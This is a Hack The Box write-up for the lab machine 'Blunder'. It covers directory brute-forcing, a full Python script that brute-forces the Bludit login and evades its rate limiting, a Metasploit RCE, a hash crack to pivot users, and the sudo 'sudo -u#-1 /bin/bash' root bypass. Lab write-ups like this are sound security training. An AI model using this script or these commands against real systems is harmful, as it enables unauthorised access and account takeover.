Home Blunder — Hack The Box [Write-up]
Post
Cancel

Blunder — Hack The Box [Write-up]

Posted May 1, 2022 Updated May 10, 2022
By Antony Magdy
4 min read

Blunder is a Linux machine rated as easy from Hack The Box, it consists on finding credentials to log in to Bludit and then use a RCE exploit to gain an initial shell, then some database files can be read in order to pivot users, finally a root shell can be spawned using sudo security bypass.

Used Tools:

  • nmap
  • Gobuster
  • Searchsploit
  • Metasploit
  • Cewl

1. SCANNING & ENUMERATION

I will start with nmap and the -A parameter to enable OS detection, version detection, script scanning, and traceroute and append the output to tee command which save the in a file named “nmap” and also show the output on the screen.

Nmap is done with port 21 closed and port 80 open.

The site is a blog website containing 3 posts and nothing more.

Let’s try directory bruteforcing. I’ll run gobsuter with -u for the url, -2 for the directory list, and -o for the output file.

1

gobuster dir -u http://10.10.10.191/ -w /usr/share/wordlists/dirb/common.txt -o directory.txt  2>/dev/null

The directory bruteforce finished and I found “/admin”, “/cgi-bin” and “/robots.txt”. /admin has an admin interface with login and password, I tried SQLInjection but reached nothing, and the cgi-bin was disabled so couldn’t proceed with attacks like shellshock and the robots.txt have nothing.

After a lot of searching I tried to rerun the directory bruteforce but with different directory list:

1

gobuster dir -u http://10.10.10.191/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o directory2.txt  2>/dev/null

I found extra: “/install.php”, “/todo.txt”, “/usb”.

2. EXPLOITATION:

visiting /install.php discloses a potential CMS “Bludit”

Checking /todo.txt the following notes are discovered:

Noticed that the CMS version isn’t updated yet, so we need to know its current version and there is a user called fergus.

Revisiting /admin is the login page, and when viewing the page source, it potentially discloses the version of bludit as 3.9.2

I searched on searchsploit for bludit 3.9.2

There is a metasploit module so let’s take a look for it:

It require a username and a password to work…

We remember that we have a username called fergus from so we need to get a password, let’s try bruteforcing the password by creating a password list from the common words in the website using cewl with the -d for depth of the search, -m for min length of the password and -w for the output

1

cewl -d 3 -m 5 -w HTB/Blunder/cewl_wordlist.txt http://10.10.10.191/

After creating our password list we need to try it… I found a python code online for Bludit Brute Force Mitigation Bypass: https://rastating.github.io/bludit-brute-force-mitigation-bypass/

After a lot of modification to make it run properly the code was as following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []

file = r"/home/kali/HTB/Blunder/cewl_wordlist.txt"  # Put here the location of the password list

file=open(file,'r')
for line in file:
  for word in line.split():
    wordlist.append(word)


for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

After executing it tries different passwords till it find a valid one “RolandDeschain”:

let’s pass it to our metasploit exploit and run it…

We successfully gained a meterpreter shell Gaining a more interactive shell:

1
2

shell
python -c 'import pty;pty.spawn("/bin/bash")'

We are now “www-data” user, Traveling to /home we found 2 users: hugo, shaun Visiting hugo we found user.txt, trying to read it but permission denied.

After a lot of searcing in the system I found 2 directories called “bludit-3.10.0a” and “bludit-3.9.2” in the /var/www directory

Visiting its bludit-3.10.0a’s content, I found a user.php file in the /var/www/bludit-3.10.0a/bl-content/databases

After reading it I found Hugo’s password hash, So let’s try to decode it online on https://hashtoolkit.com/decrypt-hash/…

It found a successfull match with a password: “Password120”

Let’s change user and get the user flag…

3. PRIVILEGE ESCALATION:

Let’s list user’s privileges or check a specific command:

This have a public exploit exploiting “sudo 1.8.27 - Security Bypass” Link: https://www.exploit-db.com/exploits/47502

So we could escalate our privileges using:

1

sudo -u#-1 /bin/bash

BOOOOOOOOOOOOOOOOOOOOM!!!!! Now we are root :D

Thank you so much for reading and I hope you learned a lot as I did ❤

0x3ashry

HackTheBox
HTB Linux
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents